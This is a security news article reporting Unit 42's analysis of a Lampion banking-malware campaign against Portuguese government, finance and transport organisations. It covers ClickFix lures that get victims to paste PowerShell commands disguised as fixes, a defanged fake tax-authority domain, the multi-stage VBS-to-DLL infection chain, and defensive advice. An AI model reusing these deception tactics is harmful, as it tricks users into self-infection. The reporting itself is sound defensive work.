Ddos 
Lampion, the banking malware first observed in 2019, has reemerged with new tricks. In a detailed analysis, Unit 42 researchers unveiled a highly targeted malware campaign aimed at Portuguese organizations in the government, finance, and transportation sectors.
“During our investigation, we found that the group has added ClickFix lures to their arsenal… under the guise of fixing computer problems,” the researchers explains.
While this campaign shares infrastructure, obfuscation techniques, and infection lures with previous Lampion operations, the attackers have now introduced ClickFix—a deceptive tactic that prompts users to copy and execute malicious PowerShell commands, believing they are resolving system issues.
“The campaign’s infection chain began with a phishing email… An HTML file within this ZIP file redirects the victim to autoridade-tributaria[.]com, a website mimicking a legitimate Portuguese tax authority,” the researchers writes.
From there, users are instructed to run a PowerShell command masked as a system fix, complete with a deceptive Portuguese comment: “#Habilitar Visualização de ficheiro” (this translates to “Enable File Preview” in English).
Lampion’s infection chain is long, fragmented, and intentionally obfuscated:
- Stage 1 & 2: VBS Downloaders – Initial Visual Basic scripts, bloated with junk variables, drop second-stage payloads via scheduled tasks to avoid immediate detection.
- Stage 3: Reconnaissance & Evade – A massive VBS file (30–50 MB) performs sandbox checks, gathers endpoint metadata, and silently schedules shutdown-triggered tasks. “The third stage does not directly execute the fourth stage but… creates a hidden scheduled task that forces the system to shut down.”
- Stage 4: DLL Loader – A 700+ MB DLL (named using infection timestamps) is dropped and executed via rundll32.exe. Each DLL uses Portuguese-named functions unique to each target.
Despite the layered architecture, researchers note that the final payload—Lampion itself—was commented out, likely indicating an unfinished or testing stage.
ClickFix has become a favored method among cybercriminals, observed in other malware campaigns like Lumma Stealer and NetSupport RAT. Its core strength lies in user deception—convincing victims to self-infect under the pretense of technical troubleshooting.
“This technique manipulates the victim into running a malicious command that infects their machine,” Unit 42 warns.
Unit 42 stresses the need for both technical defenses and user education:
- Monitor PowerShell and clipboard activity.
- Educate users on ClickFix tactics and suspicious technical prompts.
- Establish strict filters for VBScript and macro-based attachments.
Related Posts:
- State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
- ClickFix: The Rising Threat of Clipboard-Based Social Engineering
- Beware of Fake Google Meet Invites: ClickFix Campaign Spreading Infostealers
- Lazarus APT Targets Job Seekers with “Contagious Interview” Campaign Using ClickFix Technique
- Booking.com Impersonated in Phishing Campaign Delivering Credential-Stealing Malware
Donate